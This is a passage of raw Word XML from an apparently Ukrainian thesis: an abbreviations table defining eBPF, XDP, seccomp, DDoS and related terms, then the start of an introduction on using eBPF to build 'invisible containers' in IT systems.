          <w:p w:rsidR="00F95C31" w:rsidRDefault="00F95C31" w:rsidP="00F95C31">
            <w:pP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Програмне забезпечення</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B5777" w:rsidTr="002B5777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002B5777" w:rsidRDefault="002B5777" w:rsidP="002B5777">
            <w:pPr>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BPF perfcounters</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002B5777" w:rsidRDefault="002B5777" w:rsidP="002B5777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00D55BAE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>–</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7797" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002B5777" w:rsidRDefault="002B5777" w:rsidP="00F95C31">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BC794C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Monitoring &amp; P</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>erformance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B5777" w:rsidTr="002B5777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002B5777" w:rsidRDefault="002B5777" w:rsidP="002B5777">
            <w:pPr>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BPF-trace</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002B5777" w:rsidRDefault="002B5777" w:rsidP="002B5777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00D55BAE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>–</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7797" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002B5777" w:rsidRDefault="002B5777" w:rsidP="008152AB">
            <w:pP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Tracing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B5777" w:rsidRPr="008152AB" w:rsidTr="002B5777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002B5777" w:rsidRPr="00BC794C" w:rsidRDefault="002B5777" w:rsidP="002B5777">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000B0BB1">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>DDoS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002B5777" w:rsidRDefault="002B5777" w:rsidP="002B5777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00D55BAE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>–</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7797" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002B5777" w:rsidRDefault="002B5777" w:rsidP="008152AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008152AB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>(distributed) denial-of-service attack) — напад на комп'ютерну систему з наміром зробити комп'ютерні ресурси недоступними користувачам</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B5777" w:rsidTr="002B5777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002B5777" w:rsidRDefault="002B5777" w:rsidP="002B5777">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BC794C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>DoS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002B5777" w:rsidRDefault="002B5777" w:rsidP="002B5777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00D55BAE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>–</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7797" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002B5777" w:rsidRPr="008152AB" w:rsidRDefault="002B5777" w:rsidP="008152AB">
            <w:pP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Відмова в обслуговуванні</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B5777" w:rsidTr="002B5777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002B5777" w:rsidRDefault="002B5777" w:rsidP="002B5777">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004D7B19">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>eBPF</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002B5777" w:rsidRDefault="002B5777" w:rsidP="002B5777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00D55BAE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>–</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7797" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002B5777" w:rsidRDefault="002B5777" w:rsidP="008152AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BC794C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>ex</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>tended Berkeley Packet Filter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B5777" w:rsidTr="002B5777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002B5777" w:rsidRPr="002B5777" w:rsidRDefault="002B5777" w:rsidP="002B5777">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002B5777">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>HTTPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002B5777" w:rsidRPr="002B5777" w:rsidRDefault="002B5777" w:rsidP="002B5777">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002B5777">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>–</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7797" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002B5777" w:rsidRPr="002B5777" w:rsidRDefault="002B5777" w:rsidP="002B5777">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002B5777">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>Протоколи шифрування всіх даних, що передаються між клієнтом і сервером</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B5777" w:rsidTr="002B5777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002B5777" w:rsidRPr="008152AB" w:rsidRDefault="002B5777" w:rsidP="002B5777">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>IT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002B5777" w:rsidRDefault="002B5777" w:rsidP="002B5777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00D55BAE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>–</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7797" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002B5777" w:rsidRPr="008152AB" w:rsidRDefault="002B5777" w:rsidP="008152AB">
            <w:pP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Інформаційні технології</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B5777" w:rsidTr="002B5777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002B5777" w:rsidRDefault="002B5777" w:rsidP="002B5777">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Seccomp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002B5777" w:rsidRDefault="002B5777" w:rsidP="002B5777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00D55BAE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>–</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7797" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002B5777" w:rsidRDefault="002B5777" w:rsidP="008152AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000B0BB1">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Контрол</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>ь системних викликів</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B5777" w:rsidTr="002B5777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002B5777" w:rsidRDefault="002B5777" w:rsidP="002B5777">
            <w:pPr>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xBPF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002B5777" w:rsidRDefault="002B5777" w:rsidP="002B5777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00D55BAE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>–</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7797" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002B5777" w:rsidRDefault="002B5777" w:rsidP="008152AB">
            <w:pP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Socket filtering</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B5777" w:rsidRPr="008152AB" w:rsidTr="002B5777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002B5777" w:rsidRDefault="002B5777" w:rsidP="002B5777">
            <w:pPr>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XDP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002B5777" w:rsidRDefault="002B5777" w:rsidP="002B5777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00D55BAE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>–</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7797" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002B5777" w:rsidRPr="000B0BB1" w:rsidRDefault="002B5777" w:rsidP="008152AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000B0BB1">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Філь</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>трація мережевих пакетів (Express Data Path)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B5777" w:rsidTr="002B5777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002B5777" w:rsidRDefault="002B5777" w:rsidP="002B5777">
            <w:pPr>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XDP, seccomp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002B5777" w:rsidRDefault="002B5777" w:rsidP="002B5777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00D55BAE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>–</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7797" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002B5777" w:rsidRDefault="002B5777" w:rsidP="008152AB">
            <w:pP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Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="007C3ACC" w:rsidRDefault="007C3ACC" w:rsidP="00A11308">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007C3ACC" w:rsidRDefault="007C3ACC">
      <w:pP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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C3ACC" w:rsidRPr="00313723" w:rsidRDefault="007C3ACC" w:rsidP="007C3ACC">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00313723">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ВСТУП</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004160F8" w:rsidRDefault="004160F8" w:rsidP="00A11308">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DE094C" w:rsidRPr="00DE094C" w:rsidRDefault="00DE094C" w:rsidP="00DE094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Актуальність. </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE094C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Інтеграція технології </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE094C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE094C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> для побудови невидимих контейнерів в сучасних ІТ системах є надзвичайно актуальним напрямом досліджень, що відповідає на низку ключових викликів, які постають перед сучасними </w:t>
